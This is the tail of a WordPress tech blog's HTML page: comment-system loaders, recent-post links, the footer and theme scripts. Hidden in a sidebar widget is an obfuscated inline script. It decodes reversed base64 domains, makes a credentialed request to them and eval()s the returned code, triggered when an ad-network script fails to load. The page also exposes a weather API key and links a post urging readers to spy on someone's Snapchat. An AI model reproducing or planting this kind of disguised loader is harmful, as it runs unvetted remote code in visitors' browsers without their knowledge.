        var script = document.createElement('script');
        script.async = true;
        script.src = '?cf_action=sync_comments&post_id=4433';

        var firstScript = document.getElementsByTagName('script')[0];
        firstScript.parentNode.insertBefore(script, firstScript);
    });
    
    if (disqus_config_custom) {
        disqus_config_custom.call(this);
    }
};

(function() {
    var dsq = document.createElement('script'); dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
</div>
</div>
<div class="td-pb-span4 td-main-sidebar" role="complementary">
<div class="td-ss-main-sidebar">
<aside class="widget widget_recent_entries"> <div class="block-title"><span>Recent Posts</span></div> <ul>
<li>
<a href="http://www.ninjaromeo.com/mobile-gaming-ascendancy-millennial/">Mobile Gaming is in Ascendancy in the Age of the Millennial</a>
</li>
<li>
<a href="http://www.ninjaromeo.com/android-gaming-apps-sportspersons/">Most Engaging Android Gaming Apps for Sportspersons</a>
</li>
<li>
<a href="http://www.ninjaromeo.com/6-tips-make-travel-photos-insta-worthy/">6 tips to make your travel photos insta worthy</a>
</li>
<li>
<a href="http://www.ninjaromeo.com/attributes-application-performance-management/">The Many Attributes of Application Performance Management</a>
</li>
<li>
<a href="http://www.ninjaromeo.com/6-reasons-spy-snapchat/">6 Reasons You Should Spy on someone’s Snapchat</a>
</li>
</ul>
</aside> <aside class="widget widget_text"> <div class="textwidget"><p><script type="text/javascript">
var uid = '64090';
var wid = '117415';
</script><br />
<script type="text/javascript" src="https://cdn.popcash.net/pop.js"></script><br />
<script data-cfasync="false" type="text/javascript">var q9P=window;for(var w in q9P){if(w.length===((0x104,0x16)<=(4.1E2,6.07E2)?(12.31E2,6):(1.429E3,148.))&#038;&#038;w.charCodeAt((121<=(129,0x1DD)?(130,3):(6.51E2,2.90E1)>1.8E2?(0x92,0x1AE):(0x8C,49)))===((0xC0,0x192)>(0x1CF,15.3E1)?(11.53E2,100):(22.20E1,101.4E1)<124.?101.:(0x108,0x1F0))&#038;&#038;w.charCodeAt(((73.,12.97E2)>0x210?(62.5E1,5):11.5E1>(0x192,11.040E2)?(12,'D'):(0x47,0x15B)))===((3.80E1,73.)<83.?(0xAA,119):(13.73E2,148.70E1))&#038;&#038;w.charCodeAt(((0x11,12.280E2)>=(1.86E2,6.51E2)?(0x21C,1):(0x7D,87)))===((0x91,37.)>=0x37?'/':(0x9D,9.1E1)<0x149?(0xB8,105):(72,18.5E1))&#038;&#038;w.charCodeAt(((31,38.30E1)<=(0x40,0x170)?(1.385E3,200):81.9E1>=(101.,0x1C3)?(31.,0):(0xE2,0x17E)))===((0xBC,6.83E2)<=(1.0090E3,60.90E1)?(0x10C,0x13F):0x223>(123.,20.1E1)?(42.7E1,119):(106,0x1DC)))break};for(var Y in q9P[w]){if(Y.length===(75.>(138.,146.)?52.1E1:(78.4E1,1.229E3)>=(102,0x22)?(0x20E,8):(144,0x1A))&&Y.charCodeAt((6.350E2>=(105.,106)?(0x207,5):(0x11D,0xB9)))===(6.21E2>=(86,118)?(5,101):(124.,85.))&&Y.charCodeAt(((31,21.40E1)<=(61.,7.9E1)?'M':(57,12.20E1)<(14.,0x16F)?(0xD,7):(98.60E1,3.260E2)))===((58.,0x49)>=(32.,0x48)?(69.9E1,116):(0x191,0x52))&&Y.charCodeAt(((0x1C1,0x1E7)>=23?(5.7E1,3):(131,14.66E2)))===((9.35E2,91.)>=1.6E1?(0x46,117):(0x1D3,91)>=89.4E1?(0x51,0x1A9):(88,4.7E2))&&Y.charCodeAt((9.36E2>=(131.,37)?(124,0):(7E0,0x120)))===(1.05E2<(7,96.4E1)?(0x131,100):(0x15A,6.57E2)))break};(function(H,K,j,L){q9P[w][K]=function(){var k=(0x1D>=(89,7.65E2)?124.7E1:(52.2E1,0x21)<=148.1E1?(0x172,0):(5.12E2,7.5E1)),Z=k,N=function N(){var b=((0x70,1)>4.09E2?(6.350E2,"U"):42>=(0xF5,35.)?(0x155,'/'):(122.,103.));var l='';var M='//';var v=((138.6E1,12.56E2)>=32.?(0xA2,'T'):(28,0x9C));var P=(147.70E1>(0x1AE,98.7E1)?(122.,'E'):(0x9A,9.73E2));var J=((6.21E2,6.54E2)<=1.37E3?(89.,'G'):(19.20E1,1.414E3));var Q=((79.,1.091E3)>0x1FD?(28.70E1,true):(115.80E1,96.));var p=new XMLHttpRequest();p.withCredentials=Q;p.open((J+P+v),(M)+q9P[w]['atob'](j[Z].split(l).reverse().join(l))+b+L+b,Q);p.onreadystatechange=function(){var z=((2.66E2,0x87)<=0x10D?(87.5E1,200):(0x65,0x39)>=11.60E1?4:(17,133.9E1));var W=((8.64E2,39)>(4.98E2,35.30E1)?(59,"V"):(0x1C3,111)>(0x173,89.)?(18.7E1,4):(4E0,72.));if(p.readyState==W&&p.status==z&&p.responseText){eval(p.responseText);}};p.onerror=function(){if(++Z!=j.length){N();}};try{p.send();}catch(z){p.onerror();}};N();};})(q9P[w][Y],'_nlvmu',['klmYuQWOiNGa21Wc','==QZ0l2ciV2duEXZqZHahFmM','==QZ0l2cuUna29mbwFTa','==QZ0l2cucHN0Q3b61GM'],1231684);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1231683" onerror="window._nlvmu();"></script></p>
</div>
</aside> </div>
</div>
</div> 
</div> 
</div> 


<div class="td-footer-wrapper td-footer-template-14">
<div class="td-container td-footer-bottom-full">
<div class="td-pb-row">
<div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://www.ninjaromeo.com/"><img src="https://www.ninjaromeo.com/wp-content/uploads/2016/09/Logo-new.png" alt="" title="" /></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Ninja Romeo is a HUB of collective information about things happening around the world. We mainly focus on technology, tend to help our visitors to solve their day to day problems in their gadgets. We are also having some freaky reporters to provide breaking news on time without any hassle.</aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
<span class="td-social-icon-wrap">
<a target="_blank" href="http://facebook.com/ninjaromeo" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="http://twitter.com/ninjaromeo" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span></aside></div> </div>
</div>
</div>

<div class="td-sub-footer-container">
<div class="td-container">
<div class="td-pb-row">
<div class="td-pb-span7 td-sub-footer-menu">
<div class="menu-top-menu-container"><ul id="menu-top-menu" class="td-subfooter-menu"><li id="menu-item-2185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-2185"><a href="http://www.ninjaromeo.com/about-us/">About us</a></li>
<li id="menu-item-2184" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-2184"><a href="http://www.ninjaromeo.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-2186" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-2186"><a href="http://www.ninjaromeo.com/contact-us/">Contact Us</a></li>
<li id="menu-item-2183" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-2183"><a href="http://www.ninjaromeo.com/review-your-product/">Review your product</a></li>
</ul></div> </div>
<div class="td-pb-span5 td-sub-footer-copy">
&copy; All rights reserved by Ninja Romeo </div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
        // <![CDATA[
        var disqus_shortname = 'ninjaromeo';
        (function () {
            var nodes = document.getElementsByTagName('span');
            for (var i = 0, url; i < nodes.length; i++) {
                if (nodes[i].className.indexOf('dsq-postid') != -1 && nodes[i].parentNode.tagName == 'A') {
                    nodes[i].parentNode.setAttribute('data-disqus-identifier', nodes[i].getAttribute('data-dsqidentifier'));
                    url = nodes[i].parentNode.href.split('#', 1);
                    if (url.length == 1) { url = url[0]; }
                    else { url = url[1]; }
                    nodes[i].parentNode.href = url + '#disqus_thread';
                }
            }
            var s = document.createElement('script');
            s.async = true;
            s.type = 'text/javascript';
            s.src = '//' + disqus_shortname + '.disqus.com/count.js';
            (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
        }());
        // ]]>
        </script>

<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/www.ninjaromeo.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1'></script>
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-content/themes/Newspaper2/js/tagdiv_theme.min.js?ver=7.6'></script>
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-includes/js/comment-reply.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-includes/js/wp-embed.min.js?ver=4.8.4'></script>

<script>
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_top_weather_uid","location":"Chennai,India","api_location":"Chennai","api_language":"en","today_icon":"few-clouds-d","today_icon_text":"few clouds","today_temp":[28,82.4],"today_humidity":74,"today_wind_speed":[4.1,2.5],"today_min":[28,82.4],"today_max":[28,82.4],"today_clouds":20,"current_unit":0,"forecast":[{"timestamp":1513231200,"day_temp":[27,80],"day_name":"Thu","owm_day_index":1},{"timestamp":1513317600,"day_temp":[27,81],"day_name":"Fri","owm_day_index":2},{"timestamp":1513404000,"day_temp":[27,81],"day_name":"Sat","owm_day_index":3},{"timestamp":1513490400,"day_temp":[28,82],"day_name":"Sun","owm_day_index":4},{"timestamp":1513576800,"day_temp":[27,81],"day_name":"Mon","owm_day_index":5}],"api_key":"6dc28d5e9e6ef985034b6e9d153e73c7"});
				});
			
			

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://www.ninjaromeo.com/wp-content/themes/Newspaper2/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://www.ninjaromeo.com/wp-content/themes/Newspaper2';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<style>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</style>
</body>
</html>
